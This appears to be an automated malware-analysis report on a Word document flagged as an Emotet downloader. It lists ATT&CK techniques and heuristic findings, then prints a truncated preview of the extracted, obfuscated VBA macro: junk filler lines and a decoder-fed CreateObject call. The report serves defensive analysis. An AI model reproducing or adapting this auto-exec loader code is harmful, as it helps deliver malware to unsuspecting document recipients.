Verdict: MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The file is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-7356227-0. Static analysis revealed an obfuscated auto-executing VBA macro, specifically an AutoOpen macro, which is a common characteristic of Emotet. The macro utilizes CreateObject and execution sinks, indicating it's designed to download and run a secondary payload. The presence of VBA macros and the AutoOpen function strongly suggests a spearphishing attachment vector.
Heuristics (7)
- ClamAV detection (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7356227-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39325 bytes |

SHA-256: 66af2f2871a6e1158d814d901f60f63fe95f97b0057d0dcdc5d1c6abc33d549a

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Zzcetpzaqosg"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Gunpgilxuj, 0, 0, MSForms, CommandButton"
Attribute VB_Control = "Weyqqjcnv, 1, 1, MSForms, CommandButton"
Attribute VB_Control = "Ejrmwvymo, 2, 2, MSForms, CommandButton"
Attribute VB_Control = "Klcoadunh, 3, 3, MSForms, CommandButton"
Attribute VB_Control = "Nzkcsahbgsxxm, 4, 4, MSForms, CommandButton"
Attribute VB_Control = "Zriojyykht, 5, 5, MSForms, CommandButton"
Attribute VB_Control = "Uuslsnouteamb, 6, 6, MSForms, CommandButton"
Attribute VB_Control = "Ogprwtrhtxvv, 7, 7, MSForms, CommandButton"
Attribute VB_Name = "Nmyygtwpmzgkg"
Function qiwhdjkasd(qiwhdjkasdA)
On Error Resume Next
''''''Szydlowski, Miskiewicz and Krzyzanowski Suite 448 Southwest Augustyn, Dziedzic and Partyka Apt. 988 East
''''''Podgórski Inc Apt. 647 West Soltysiak, Gawlik and Konieczny Apt. 821 North
Xyxlkmebsj = Fix("221.135.12.74")
Grygczzxmmken = Sin(Ifqumalm)
Ddlazbxsub = "Mozilla/5.0 (Windows NT 5.0; Win64; rv:14.7) Gecko/20100101 Firefox/14.7.1"
''''''Blaszczyk, Dominiak and Józwik Suite 323 East Koziol - Bielecki Apt. 909 East
Mzxqqyko = CDate(219)
''''''Rak LLC Suite 116 West Piórkowski - Noga Suite 519 Northeast
Yjvvcosxvfyvz = Hex(Xmlmltknfsq)
Jnblsffceezja = Log(536)
''''''Slusarczyk - Soltys Suite 833 Southwest Marczak, Twardowski and Kania Apt. 581 West
''''''Skiba LLC Apt. 279 West Jakubowski, Poplawski and Nawrocki Suite 634 Northeast
Kfraadslz = Int(Envqclqwo)
Mcuqktil = Sgn(669)
''''''Zuk Inc Apt. 363 Southeast Olejnik and Sons Apt. 098 West
Wedzbpxsqc = "Cheese"
Margnbnsej = Spgkszcnx
''''''Kubik and Sons Apt. 112 Southeast Biernacki Inc Suite 399 Northeast
Jsqbvtdxfb = Oct("Pizza")
Tzefhylgmfw = Int(Jmarzolprh)
Zrybltepymkot = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
''''''Wieckowski, Lesniewski and Stepien Suite 170 East Brzezinski - Drózdz Suite 073 Southeast
Mpvevjomgcg = Sin(13)
Set qiwhdjkasd = CreateObject(Hafkgnhwrqi(Hafkgnhwrqi(qiwhdjkasdA)))
''''''Paszkowski Inc Suite 038 Southeast Lapinski - Józwik Suite 732 Northwest
''''''Mackiewicz, Dudek and Kubiak Apt. 496 West Mika Inc Apt. 212 Southeast
Oniwmbfydf = Hex("Larkin - DickinsonApt. 686North")
Qhgfywbylev = CStr(Lztlgehanngxz)
Oridmyzi = "248.9.113.180"
''''''Gawron, Janiszewski and Rusin Suite 756 North Gawel - Kuc Apt. 428 West
Cnnwxjrgab = Atn(362)
''''''Nawrocki, Niedzielski and Wolny Suite 664 Northeast Stawicki, Sokolowski and Sadowski Apt. 808 Southwest
Mwbtndtziy = Atn(Kuvspylr)
Equepdoq = Rnd(719)
''''''Wysocki Group Apt. 768 North Skóra, Górka and Warchol Suite 326 South
''''''Radomski - Szyszka Apt. 562 North Skiba, Szymczak and Jaros Apt. 346 Northeast
Ycembtkwot = Round(Clmdnzrc)
Ljskzjoplr = CDbl(18)
''''''Wójcicki and Sons Suite 890 Northwest Wolinski, Górecki and Pawlik Apt. 451 Southeast
Dipjqwnp = "Ernser, Kemmer and HegmannApt. 485Northwest"
Cboirmppz = Oqvurtaiziie
''''''Jedrzejewski Group Suite 637 North Trzcinski, Lukasik and Serafin Suite 381 East
Eneivoahd = CLng("97.166.68.55")
Wrsbzvsbior = Hex(Zcnhdzuxoan)
Gejtgnpdvc = "Cheese"
''''''Jurkowski - Dudzik Suite 677 South Przybyla, Sliwinski and Kucharczyk Suite 331 West
Zmpcrtnup = Atn(752)
End Function
Function Iyqnxyvhiwcb()
On Error Resume Next
''''''Cichon LLC Suite 366 Northwest Cygan Inc Suite 054 West
''''''Chmura, Grzegorczyk and Zawadzki Apt. 562 West Partyka, Stachowiak and Paluch Suite 565 East
Uuqptrtoga = Tan("Chicken")
Kbaxdteyamfp = Sqr(Odrujafo)
Okyajvjfbhs = "Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/536.2.0 (KHTML, like Gecko) Chrome/23.0.885.0 Safari/536.2.0"
''''''Romanowski and Sons Apt. 964 North Mlynarczyk - Owczarek Apt. 715 Southwest
Gvymekhobct = Log(854)
''''''Galka Inc Apt. 265 Northeast Malek Group Suite 915 West
Wlrspwkjisv =
... (truncated)